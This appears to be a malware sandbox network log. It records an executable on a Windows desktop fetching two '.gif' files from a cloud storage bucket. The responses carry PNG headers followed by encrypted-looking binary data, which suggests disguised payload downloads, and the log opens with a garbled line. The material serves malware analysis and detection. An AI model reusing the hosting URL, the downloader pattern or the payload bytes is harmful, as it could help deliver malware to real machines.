l%00XEG#vi([[K%f).GDG@'n!,EUYB!1l!NL@n')&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&NRRV%lyyLj? aLl/`gn'hehx%hG$mclllllllllllllllllllllllllllllllllo&33[FD uj+XXH&e*-DGDC$m"/FVZA"2o"MOAo&('''''''''''''''''''''''''''''''''OSSW$mxxMk>!

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49931	39.103.20.26	443	3916	C:\Users\user\Desktop\2749837485743-7684385786.05.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-06 03:50:38 UTC	111	OUT	GET /a.gif HTTP/1.1 User-Agent: GetData Host: hu5wd1.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2025-01-06 03:50:39 UTC	546	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Mon, 06 Jan 2025 03:50:39 GMT Content-Type: image/gif Content-Length: 135589 Connection: close x-oss-request-id: 677B530E478AB33331F4359C Accept-Ranges: bytes ETag: "0DDD3F02B74B01D739C45956D8FD12B7" Last-Modified: Sun, 05 Jan 2025 09:00:15 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 8642451798640735006 x-oss-storage-class: Standard x-oss-ec: 0048-00000104 Content-Disposition: attachment x-oss-force-download: true Content-MD5: Dd0/ArdLAdc5xFlW2P0Stw== x-oss-server-time: 31
2025-01-06 03:50:39 UTC	3550	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10 Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
2025-01-06 03:50:39 UTC	4096	IN	Data Raw: 92 94 95 15 58 67 66 8f 0d ac 9c 9e d7 25 61 ea 28 7c d1 e2 ef 25 bc 8d ce ad ad e6 24 78 4e a7 6d 84 b4 b6 ff 3d 79 ce ae f0 30 fa 9b e0 89 4f 97 e0 f5 8e 4a c5 b1 9a ca cc 32 1e 44 28 99 59 18 2b c0 75 e7 d9 d9 59 24 df a8 d2 97 6d ad c6 d3 0c 89 da e7 e8 02 e8 d8 2c a5 6b 2f b8 7a 4e d7 b4 f7 f6 f7 b0 72 66 df ac ff fe ff 48 88 07 bd b1 04 06 08 8c db 0a 0b 0c 45 83 1a 91 41 13 13 5c 9e de e8 0d 61 2a 1a 1c 55 95 12 81 94 23 23 6c a8 33 5d 78 28 2a 63 a5 28 4d 9a 31 31 cd 26 69 05 37 37 70 b2 37 bd 89 3c 3e 77 cd 54 35 13 45 45 0e ce 4d 39 ff 4a 4c b2 5b 0d 60 50 52 1b df 58 3d e2 59 59 12 d6 49 39 0e 5e 60 29 eb 66 89 d1 67 67 97 7c 4d 5b 6d 6d 26 e4 7d 21 c7 72 74 3d fb 62 21 29 7b 7b 34 f4 7b 65 35 80 82 7c 91 89 b6 86 88 c1 01 86 b9 38 8f 8f d8 1c Data Ascii: Xgf%a(\|%$xNm=y0OJ2D(Y+uY$m,k/zNrfHEA\aU##l3]x(c(M11&i77p7<>wT5EEM9JL[`PRX=YYI9^`)fgg\|M[mm&}!rt=b!){{4{e5\|8
2025-01-06 03:50:39 UTC	4096	IN	Data Raw: 6c 81 49 b6 96 98 1c 6c ee db d5 13 d3 84 f1 5d b6 e1 84 a7 a7 2b 69 ab e7 cf 4d e3 ac 54 4e a7 ed 94 b4 b6 fa 33 7d f2 30 74 8e 6c 40 d5 d9 e2 c2 c4 8d 43 07 80 42 22 bf df 85 43 9b f4 81 9f 58 10 9d 5d 1f 30 41 ec db dc 91 55 32 ac 68 89 d3 6f e0 e9 41 e9 e9 a2 66 e1 81 4b ee f0 ca 0c 7a b7 c9 f9 b8 06 06 ef 75 dc fc fe b7 8b 0c 95 97 05 05 4a 8c a4 2d 7a 03 0c 0d 42 84 b4 35 6a 1b 14 15 5e 94 e1 e6 52 90 b0 39 86 17 20 21 57 69 6c ae 23 a5 8d 28 2a 67 a7 20 5d 8a 31 31 7e b8 31 61 93 36 38 b2 2f 4d 99 3c 3e 86 41 41 42 43 08 cc 32 63 60 01 c3 0f 68 6d b1 5a 51 f4 53 53 1c de 5b 15 cc 58 5a de 9c d6 ae 16 6f 29 ad e6 a4 2d ef 6a 59 fd 6b 6b 14 73 22 e2 3c 55 4e 36 47 b5 cc f9 6b 79 7a 33 bb 39 5a 5f 84 81 82 83 7b 90 cd 22 89 89 01 7b c4 00 83 45 34 90 Data Ascii: lIl]+iMTN3}0tl@CB"CX]0AU2hoAfKzuJ-zB5j^R9 !Wil#(*g ]11~1a68/M<>AABC2c`hmZQSS[XZo)-jYkks"<UN6Gkyz39Z_{"{E4
2025-01-06 03:50:39 UTC	4096	IN	Data Raw: 75 9b 94 96 df 13 d5 be cb 63 88 7d 90 a1 a1 ea 2e a9 c1 30 a6 a8 56 bf 6d bc ac ae 2a 4f c9 af 32 4f 3f a5 b7 b8 cd af 3a 47 36 ad bf c0 b5 cf 8b 4f 10 7f c7 cc c9 ca 23 79 3b 31 30 5b 16 9a 58 68 f1 76 d7 d8 d9 92 58 18 bd 9f 82 a1 bd bc be bf 26 2a 2b 24 25 26 27 20 21 22 23 3c 3d 3e 3f 38 bd 7f ab dc e9 b2 72 90 d9 e6 a8 48 82 ee 33 8f c4 4f 8c d0 41 81 f1 8f e5 0a 84 f9 1e 96 c1 14 15 16 94 e0 18 15 9f b1 1d 1e 1f 68 ac 2f 15 b1 24 26 6f a1 5d 0e 6b d3 38 75 3f 31 31 7a b8 39 51 b2 36 38 71 b9 c2 c3 48 6b 73 cb 4c 1d d6 45 45 0a cc 4d 09 df 4a 4c c6 5b 2d c5 50 52 1b d9 50 15 d3 59 59 e3 5a 5c 5d 5e 17 e9 25 46 4b 2c ee 63 25 fd 68 6a 23 e5 29 4a 4f 8f 64 ad e7 75 75 3e fc 75 59 fe 7a 7c f6 8e 37 03 49 7d 06 72 cd 89 cf 40 0c 7c c3 05 80 85 0b 91 91 Data Ascii: uc}.0VmO2O?:G6O#y;10[XhvX&+$%&' !"#<=>?8rH3OAh/$&o]k8u?11z9Q68qHksLEEMJL[-PRPYYZ\]^%FK,c%hj#)JOduu>uYz\|7I}r@\|
2025-01-06 03:50:39 UTC	4096	IN	Data Raw: b7 ac d4 2f 87 98 99 9a d3 17 d5 96 ac 72 e9 2b ff 80 8d ee 2e e4 8d 96 e3 27 e1 8a 9f 77 f5 96 8b b5 b5 b6 b7 7f fd 9e ff be bd be bf 88 48 9e e7 e4 3a d3 4d 37 c9 ca 4e 0c b8 c8 30 c5 d1 d2 d2 d4 9d 5d 9b fc e9 25 ce c1 dd df df 27 e4 4d 65 e5 e5 e7 e7 e8 e9 d9 22 04 89 21 10 0f b9 7f fe 91 70 f7 f7 07 ec 75 fb fd fd b6 7c 3d 96 76 02 04 fa 4a 8a 05 31 fb f4 f3 41 87 02 81 94 13 13 d3 10 81 92 19 19 19 3b 1c 1d 56 96 3d 49 a7 22 24 6d af 3a a9 ac 2b 2b 59 16 6b 1c f0 79 bf 36 51 41 37 37 82 3a 1a 3b 3c 75 b7 7b 64 69 03 ce 0c 44 0e ce 14 6d 6a b4 59 49 cb 4e 50 19 d9 46 11 21 57 57 11 da 92 a4 d9 9d 17 50 28 b1 2a ea 71 51 12 66 68 21 e7 66 81 e9 6f 6f 8f 64 8d 8c 74 75 9e bd 90 86 85 33 f1 31 5a 2f b3 53 c3 3b 98 84 86 87 60 a1 ee 8b 8c c5 03 c3 b4 c1 Data Ascii: /r+.'wH:M7N0]%'Me"!pu\|=vJ1A;V=I"$m:++Yky6QA77:;<u{diDmjYINPF!WWP(*qQfh!foodtu31Z/S;`
2025-01-06 03:50:39 UTC	4096	IN	Data Raw: b7 d4 16 36 5f 98 99 9a 66 24 62 61 60 df e9 29 d7 80 cd ee 24 6c f9 f5 68 e4 28 58 db 05 f9 39 f7 90 85 fe 3e e4 9d da 38 c4 a9 be ca 84 a7 a4 a5 54 ca 71 d8 ae 4a 31 8a be c7 a8 4c 2b 8b a5 d7 b2 56 15 f7 d7 6e dc bd e1 9c de ad ea 87 df b9 e4 92 e2 81 ed c9 ea a3 6f 2a ec a7 73 37 f0 95 71 2e 82 b6 9e c2 22 8f 34 16 c4 99 66 91 64 65 94 0a b1 08 40 84 5e 2f 3c e5 dd 26 10 11 1d a4 1a 5d 9b 43 3c 29 7c 90 c4 55 9d d8 22 c9 9d 0a 24 25 6e a4 ee 2b 4c ae f7 59 2b 49 0b e9 46 e2 78 be 6a 13 78 36 8d f3 33 8a fd 77 cb 1d 66 23 6f 84 c6 3b 6c 01 4a 3f 44 0c cd ec 98 51 52 53 a9 1d dd 23 7c 31 12 d8 98 0d 01 9c ac ad ae af a8 2d e5 8b 50 ea 57 ae 06 6c 6e 6f 3c fa bb 7c f1 f7 76 77 78 31 ff b2 09 50 96 5d ad 81 82 c6 b7 4c c3 b4 48 ba 58 b8 45 c5 49 cb b4 b1 Data Ascii: 6_f$ba`)$lh(X9>8TqJ1L+Vno*s7q."4fde@^/<&]C<)\|U"$%n+LY+IFxjx63wf#o;lJ?DQRS#\|1-PWlno<\|vwx1P]LHXEI
2025-01-06 03:50:39 UTC	4096	IN	Data Raw: ce d5 c9 c9 c9 c5 5a 56 57 50 51 52 53 6c 6d 6e 6f 68 e5 f5 ef 2b 45 9a e3 29 64 e6 24 69 be 36 d4 b5 b5 b6 ff 3d 6b b5 3f e2 bc be bf 85 f2 10 8e 41 05 8a 4c 11 bd e2 8a c3 7a ce a9 55 11 a6 cc 95 6f d4 d7 d8 d9 93 e0 0e d2 58 25 e0 e1 e2 af 69 bc e4 81 61 e8 8c aa 2b ee d4 ef bd f2 28 be 71 3c 82 ad 9e b8 79 c2 fc 89 ad 99 66 91 64 65 94 4c 85 c5 09 45 31 d9 03 8e c5 0f 10 11 53 1c a3 14 5f 94 d9 1b 53 98 df 1f 78 5e a9 62 dc 45 65 a6 1f 27 5d f2 6b 24 9b 6c d0 49 0d 1e 32 47 29 53 0b 6b 38 4d 2d 72 bf ff 3f 73 7b 93 4d c0 d1 45 46 47 2e 08 8d 48 10 4d 07 cc 93 53 1a d8 18 71 36 1f dd 90 2e 73 3a de 67 5f 14 43 04 05 f4 2c e5 a5 69 25 51 b9 1f 02 61 d8 71 39 f1 b2 76 3c f5 b4 7a 1f 3b f2 3f 83 18 fc b9 81 f7 62 cc 0e ca a3 e0 c1 0f 42 f8 cb 81 38 91 f7 Data Ascii: ZVWPQRSlmnoh+E)d$i6=k?ALzUoX%ia+(q<yfdeLE1S_Sx^bEe']k$lI2G)Sk8M-r?s{MEFG.HMSq6.s:g_C,i%Qaq9v<z;?bB8
2025-01-06 03:50:39 UTC	4096	IN	Data Raw: db 17 55 b6 de 1b 71 9b ee 4c d5 15 1d f8 a0 a2 a3 54 26 26 c7 a9 a9 aa aa 6f 61 62 63 7c 7d 7e 7f 78 fd 33 7e b7 3d 2c bb bc bd 4e 3c c1 3e 8a 48 45 d5 c7 c7 c8 81 4f 0b b8 c9 3e 4c d0 2e 9a 58 55 f5 d7 d7 d8 91 5f 1b a8 d9 2e 5c e0 1e aa 68 65 fd e7 e7 e8 a1 6f 2b 98 e9 1e 6c f0 0e ba 78 75 c5 f7 f7 f8 b1 7f 3b 88 f9 0e 7c 00 fe 4a 8e 45 5d 47 bf 0e 09 0a 0b 40 80 03 fd 24 10 12 75 84 59 2f 5f e8 6d 16 53 97 0d 56 9a f2 55 26 d3 a7 27 d9 6f ab 51 d2 2b 58 20 66 a4 60 39 7a b6 e6 41 32 c7 bb 3b c5 73 bf fd 1e 76 c3 a9 43 36 94 0d cd c6 10 48 4a 4b bc ce ce 2f 51 51 52 ac 1c de 97 94 94 95 96 97 90 91 92 93 ac ad ae af a8 25 35 2f eb 85 4a 23 e9 bf 26 e4 aa 05 37 3b f1 bc 02 37 34 f2 6b 37 47 af 0a 50 c8 08 93 cb 0f 4f 6e 0d 76 76 75 c6 09 5f fa 90 d9 1a Data Ascii: UqLT&&oabc\|}~x3~=,N<>HEO>L.XU_.\heo+lxu;\|JE]G@$uY/_mSVU&'oQ+X f`9zA2;svC6HJK/QQR%5/J#&7;74k7GPOnvvu_
2025-01-06 03:50:39 UTC	4096	IN	Data Raw: 56 1f 5a 7e 3d d3 99 9a d3 17 d6 8e 14 50 ae 14 e7 80 95 2e a6 41 2a aa ab ac e5 25 db 94 f1 31 7a 94 36 7e 48 31 f2 a2 f3 37 e1 9a f7 88 42 06 e3 9b 06 45 38 37 bd e9 48 33 33 ba d1 98 5a 15 9b 5f 1a 9e 5a cd d1 82 da dc 5e 3e c0 a8 20 1b e6 ac 8e 26 bf a0 ea ee 21 07 ea a6 62 f5 71 d8 f2 f4 03 b6 ff d8 8d e9 c8 2e 76 31 bb 8d 43 00 eb d9 44 06 07 40 8a f2 f4 78 2b 46 84 5b 01 98 57 30 25 9e 16 f3 0f a7 1a 1c 1d 1e 57 ad 75 06 13 af ea 62 ac ed c1 3d 60 2c 2d a5 df 0b c4 46 3a b7 7e 2e 17 bb f1 c5 d0 39 32 88 7b 64 71 0a c8 28 61 7e 0f c3 3d 6e 0b 04 c6 12 6b 18 19 d1 97 74 0a 95 9b 94 95 96 97 90 91 92 93 ac ad ae af a8 2d ef 3b 4c 79 3c 23 ef 81 0e 22 f5 b8 3f f8 a5 3c fd 87 30 f2 a0 37 f7 a4 0b 50 68 a1 7f 7c 7b c0 b5 4e cd ba 4a 4c 8c 9b 8e 8f 90 a2 Data Ascii: VZ~=P.A*%1z6~H17BE87H33Z_Z^> &!bq.v1CD@x+F[W0%Wub=`,-F:~.92{dq(a~=nkt-;Ly<#"?<07Ph\|{NJL
2025-01-06 03:50:39 UTC	4096	IN	Data Raw: 65 57 94 e2 9f d0 12 55 73 09 58 61 60 e8 2a 65 eb 2f f9 82 97 e0 2a 6e 8b f3 6e 62 63 7c 7d 7e 7f 78 f9 3b f6 a9 f1 39 79 ad f1 95 7d a6 51 a4 a5 54 ca 70 cd 8a c6 7c cf ce e6 06 ba d8 99 51 11 d5 50 16 a2 34 5c 13 d4 48 1d 1d 13 2c 2d 2e 2f 28 ad 6f ea 01 c2 eb eb 2f 21 22 23 3c 3d 3e 3f 38 b5 a5 bf 7b 15 da b3 77 24 b6 74 0d d1 29 02 04 ed 1d e4 f7 f6 42 8e cc 79 1a 47 9b da ed c3 91 d5 62 1c a0 18 1a 1b 1c 55 9d db 00 7a e1 10 e4 6d a5 e3 08 72 e9 e7 e0 e1 e2 e3 fc fd fe ff f8 75 65 7f bb d5 1a 73 bf c4 de 77 cb 98 4d c4 df 45 46 47 00 c0 3e 6f 7c 05 cb 86 ee 50 52 53 54 1d 59 12 a9 11 d3 27 78 65 38 39 f0 07 04 05 f4 2d ed 6a d9 59 6b 6b 24 e8 a7 1a 50 99 7d 77 74 75 cf 69 78 79 7a 93 b9 7c 7e 7f 39 7e 82 83 84 6d 4d 74 77 76 c2 00 81 01 be 8e 90 dd Data Ascii: eWUsXa`e/nnbc\|}~x;9y}QTp\|QP4\H,-./(o/!"#<=>?8{w$t)ByGbUzmrueswMEFG>o\|PRSTY'xe89-jYkk$P}wtuixyz\|~9~mMtwv

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49942	39.103.20.26	443	3916	C:\Users\user\Desktop\2749837485743-7684385786.05.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-06 03:50:40 UTC	111	OUT	GET /b.gif HTTP/1.1 User-Agent: GetData Host: hu5wd1.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2025-01-06 03:50:41 UTC	547	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Mon, 06 Jan 2025 03:50:40 GMT Content-Type: image/gif Content-Length: 125333 Connection: close x-oss-request-id: 677B5310E48B2B3936FB0A1A Accept-Ranges: bytes ETag: "2CA9F4AB0970AA58989D66D9458F8701" Last-Modified: Sun, 05 Jan 2025 09:00:15 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 10333201072197591521 x-oss-storage-class: Standard x-oss-ec: 0048-00000104 Content-Disposition: attachment x-oss-force-download: true Content-MD5: LKn0qwlwqliYnWbZRY+HAQ== x-oss-server-time: 28
2025-01-06 03:50:41 UTC	3549	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10 Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
2025-01-06 03:50:41 UTC	4096	IN	Data Raw: 5e 5f 58 dd 1d c6 90 d1 17 9e 99 14 9f 9f e8 24 70 eb ab e0 64 64 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 fd 3f eb 9c b1 ed f3 3f 51 9e f7 4d c4 05 d1 c5 c5 8e 4c 31 81 43 ca 47 17 86 4c 11 d9 3a 49 f3 d5 d6 21 1b d8 ae d6 66 c5 de df e0 a9 69 2c 0c cd ed e7 e8 a1 61 b7 c8 dd a6 64 37 b9 71 37 d4 aa 35 3b 34 35 36 37 30 31 32 33 cc cd ce cf c8 4d 8b 02 89 1b 0b 0b 44 84 0f 47 93 d0 1a fa 4d 32 16 17 d4 d5 d6 d7 d0 d1 d2 d3 ec ed ee ef e8 6d ab 22 b9 a1 2b 2b 64 ea 6f 3f 30 31 32 33 7c bc 77 3f 70 b4 3f dd 2e 3c 3e 77 c9 40 0a c8 85 86 8a 8b 84 85 86 87 80 81 82 83 9c 9d 9e 9f 98 1d d5 bb 10 11 d7 17 78 7d b6 9d 9f 9e 9d 2b e9 70 7d c1 69 69 22 e6 20 49 4e 87 11 59 72 73 b8 35 25 3f fb 95 5a 33 f7 a4 36 f4 42 c9 0f 8e 81 97 87 87 87 de 4a c3 01 de 86 c7 19 Data Ascii: ^_X$pdddefg`abc\|}~x??QML1CGL:I!fi,ad7q75;45670123MDGM2m"++do?0123\|w?p?.<>w@x}+p}ii" INYrs5%?Z36BJ
2025-01-06 03:50:41 UTC	4096	IN	Data Raw: 6d 6d 6b 6a 06 df 1b 5d a2 58 50 d5 1d 73 88 18 aa a3 a4 a5 4e a1 a8 a9 aa 3b e4 2e 6a 87 73 38 fe 97 bc fd 35 5b 90 00 ad bb bc bd 41 aa f1 c1 c3 c3 41 05 b2 cf 43 8d ee fb 47 05 03 e6 98 5c df bd 6f d4 d6 3f ad d9 da db 94 56 9a fb c8 a9 6b e6 b1 59 e7 e7 a0 64 ae cf c4 a5 6d 2f f8 b9 7b f6 11 4e f7 f7 b0 72 ff c5 40 fc fe b7 89 04 ad b9 05 05 c1 02 9d b3 0b 0b 05 09 0e cf d7 14 9d a9 15 15 17 17 18 19 dd 1e 85 a7 1f 1f 21 21 22 23 9c 2d 26 27 28 61 41 eb 2c 65 a3 22 a1 8b 33 33 bf 61 12 07 70 b0 2e 3a 74 b0 33 f5 42 40 42 ab 09 bb b9 b8 d8 01 c9 8f 64 8e 82 83 9c 19 db 0f 70 75 01 1f db b5 1a 13 d7 84 a1 4a 01 9e 62 63 2c ee dd 9f 68 69 6a 23 e1 39 4a 3f 38 fa bd 36 47 b5 89 62 29 86 7a 7b 34 f8 be 0b b2 c9 01 e7 a0 bd 86 cf 05 c5 ae d3 c4 06 da ab c0 Data Ascii: mmkj]XPsN;.js85[AACG\o?VkYdm/{Nr@!!"#-&'(aA,e"33ap.:t3B@BdpuJbc,hij#9J?86Gb)z{4
2025-01-06 03:50:41 UTC	4096	IN	Data Raw: c2 4b 9b bd e2 b3 b8 d1 11 54 fa 92 e1 ef 78 e4 29 53 97 53 4e e5 ab a9 aa ef 27 a2 9d 7d f5 34 7b bc 30 77 b6 b7 b8 f5 31 fc b4 f1 33 aa 41 0e 3d 3c 8c 4e 81 df 43 02 8e f0 3c b1 d5 87 11 39 f2 97 ef 25 a9 c5 5d 10 51 01 57 2f d1 9b 39 68 be c7 cc ea ce 93 cc c9 ab e4 5a e5 11 2d 73 10 fd b9 fb 4b 72 e6 f8 dd fb fb be 77 72 ee 10 25 03 03 48 2e c6 46 83 49 f6 d8 e4 41 87 48 18 98 55 0b 55 1a a0 1f 9b f8 15 51 13 a3 9a 0e 20 05 23 23 66 af aa 36 38 0d 2b 2b 60 06 ee 6e bb 71 ce e0 dc 79 bf 70 30 b0 7d 27 7d 32 88 37 c3 a0 4d 09 4b fb c2 56 48 6d 4b 4b 0e c7 c2 5e 40 75 53 53 18 7e 96 16 d3 19 a6 88 b4 11 d7 18 68 e8 25 43 25 ee 66 2e eb a9 6e 27 e5 2a 66 e6 37 55 33 48 a5 7a f3 3e 87 86 85 84 ba 1b 71 00 f4 a5 c2 cb 09 d1 a2 c7 01 fd ae b3 c4 06 41 67 c9 Data Ascii: KTx)SSN'}4{0w13A=<NC<9%]QW/9hZ-sKrwr%H.FIAHUUQ ##f68++`nqyp0}'}27MKVHmKK^@uSS~h%C%f.n'*f7U3Hz>qAg
2025-01-06 03:50:41 UTC	4096	IN	Data Raw: 19 d1 84 d1 1d 87 d9 96 2c 92 1f 7c 91 d5 af 1f 26 92 a4 81 a7 a7 ea 23 26 9a bc 89 af af fc 9a 7a f2 3f f4 4a 64 50 ba 4a 30 7a f4 bd 7d 88 c2 05 8b ff 1d b4 ec 89 c6 7c c2 8d 32 0e 4c 31 de 98 dc 6a 51 e7 d7 fc d8 da 99 56 51 ef cf c4 e0 e2 af cf 2d a7 6c b9 15 39 01 13 27 ab d4 33 83 57 b6 71 35 f9 b3 2d 72 38 10 fe 76 3b b7 8b 5d 26 13 4c 8e 6a 23 10 41 81 7f 28 2d 46 84 6c 35 3a 52 4a d6 da db d4 51 93 47 38 15 56 96 54 05 32 6b ad 59 02 3f 69 7c 6b 7d 6d 7a 66 ac dc 01 7f b8 c5 7c bd ef 70 b2 c8 77 b7 d4 0d c0 01 78 3a 47 30 4a 0b 24 30 4d a2 b9 b8 b2 b1 06 dd 45 55 b8 52 1d dd 80 1c d2 a5 13 d9 8f 51 db 17 60 62 63 21 e0 99 13 79 81 b9 9f 93 92 26 e4 b8 39 11 30 70 3d 75 bf 93 7a 32 f0 b3 3d 46 06 90 8e 06 d7 85 85 86 be f3 81 ff 83 b5 b6 81 02 d7 Data Ascii: ,\|&#&z?JdPJ0z}\|2L1jQVQ-l9'3Wq5-r8v;]&Lj#A(-Fl5:RJQG8VT2kY?i\|k}mzf\|pwx:G0J$0MEURQ`bc!y&90p=uz2=F
2025-01-06 03:50:41 UTC	4096	IN	Data Raw: de 1a f0 b1 a6 df 11 dd be b3 d0 14 ea bb 80 49 6d 55 5b 5a ea 2c d5 29 e7 20 eb a5 e6 22 a5 21 1d 4c 4b f4 b9 01 b0 3a 5b b4 f4 b2 00 3b d1 c1 e6 c2 c4 4f 4a d6 d8 ed cb cb 80 e6 0e 8e 5b 91 2e 00 3c 98 5f 90 d0 98 53 9c c4 9c d1 69 e8 62 03 ec ac ea 58 63 f9 e9 ce ea ec 67 62 fe e0 d5 f3 f3 b8 de 36 b6 73 b9 06 28 14 b0 77 b8 08 40 8b 44 18 44 09 b1 00 8a eb 04 44 02 b0 8b 01 11 36 12 14 9f 9a 06 08 3d 1b 1b 50 36 de 5e ab 61 de f0 cc ae 6a 03 40 68 a3 6c 0c d2 ef 62 b9 76 3a 7a b9 75 32 76 b3 29 73 b2 7b 35 7f b6 17 65 cb 0f 60 2d 7d 0a 88 46 c8 5a b2 b2 b1 0e a6 57 12 27 05 1c dd 81 10 d2 94 b3 69 81 a1 a0 e4 a1 6d e7 f0 65 66 67 83 55 e9 16 9c 6d 18 59 f0 cc 8a 73 74 75 76 78 fd ee 7a 7b 7c f6 fb 7f 81 81 82 cf 0f 4b ca 0e ec ad b2 c6 07 48 07 cb b4 Data Ascii: ImU[Z,) "!LK:[;OJ[.<_SibXcgb6s(w@DDD6=P6^aj@hlbv:zu2v)s{5e`-}FZW'imefgUmYstuvxz{\|KH
2025-01-06 03:50:41 UTC	4096	IN	Data Raw: 19 52 57 d5 c5 df 1b 75 ba d3 17 44 d6 14 62 e9 2f ae 41 67 a6 a7 a7 fe 6a e3 25 a6 e6 22 e3 b9 fa 3e fc bd b9 a6 ba 51 99 6c 43 42 f6 32 c5 29 06 c3 c4 8d 4f c4 80 42 09 83 4f 09 ee 94 13 99 51 b2 c4 d5 9e 5a dd 39 1e db dc 95 57 9e e8 a9 6f e6 21 21 e6 e7 a0 60 eb a3 67 2c 2d 23 3c b1 a1 a5 a3 b4 a2 b6 ad b8 ac ba ab b5 7d 13 70 49 89 fa 41 36 f9 43 81 75 2e 2b 48 2c b2 2b a0 11 12 13 58 34 6a 33 30 55 3b a7 38 d5 1e 1f 20 c9 85 ff db da 6a ac 40 01 66 a2 40 09 6e c7 a9 ed cd cc 7c be 76 17 70 b0 be 1f fc 3d 3e 3f 08 ca 35 13 0c cc f2 63 f0 49 4a 4b 04 c6 09 07 18 d8 16 77 64 1d dd 08 18 11 d1 1c 6c 15 d7 1b 44 29 2e e8 13 4d 2a ee 1c 4d 3a 23 e7 a6 86 29 7f 71 72 9b 21 a9 89 88 30 f0 0a 5b 94 31 a2 80 7f c9 0b db ac 6d c5 5b 77 76 c2 00 dc ad c6 04 c2 Data Ascii: RWuDb/Agj%">QlCB2)OBOQZ9Wo!!`g,-#<}pIA6Cu.+H,+X4j30U;8 j@f@n\|vp=>?5cIJKwdlD).M*M:#)qr!0[1m[wv
2025-01-06 03:50:41 UTC	4096	IN	Data Raw: b6 83 dd 52 57 b7 9d 0a 83 72 99 9d 9e 9f 6c 6d 6e 6f 68 66 6a 6b 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 76 7a 7b 74 f1 31 be a9 0f be bf 88 4c d7 ad 73 3a 39 8f f3 0b be e8 a9 85 45 cb f5 e1 d2 d3 d4 9d 5d 5e 40 d9 da db 94 e6 96 cf 92 e7 aa d8 ac ed 90 e0 51 e4 ea eb ec 20 c7 2c 3c b1 a1 bb 77 19 d6 c4 23 b1 77 ee 81 8c ff ff 45 32 c2 4b 89 09 9d 4f 85 05 c0 b1 ac 02 0e 0f f8 c9 10 13 14 90 d6 63 09 e6 1f 9d 6d 1c 1e e0 e3 a2 d9 22 56 f6 96 26 c3 2e c2 21 2c 2d 2e 1d f0 79 b1 f7 14 6e f5 fb f4 79 69 73 bf d1 1e b4 5d 21 33 42 44 ae 5b 0f c5 4c 65 3a 4d 4d b1 84 18 dc 5e c8 1c d8 5a 9f a7 4c 4d eb 5c 5d a1 52 21 10 63 63 e1 be 13 b8 d8 68 22 e8 a8 4d 35 ac bc 39 fb 2f 50 7d 3e fe 14 5d 6a 33 f5 09 5a 67 d7 c0 d6 c2 d1 c4 d0 c6 df c1 09 67 ac 06 77 c3 1d Data Ascii: RWrlmnohfjkdefg`abc\|}~xvz{t1Ls:9E]^@Q ,<w#wE2KOcm"V&.!,-.ynyis]!3BD[Le:MM^ZLM\]R!cch"M59/P}>]j3Zggw
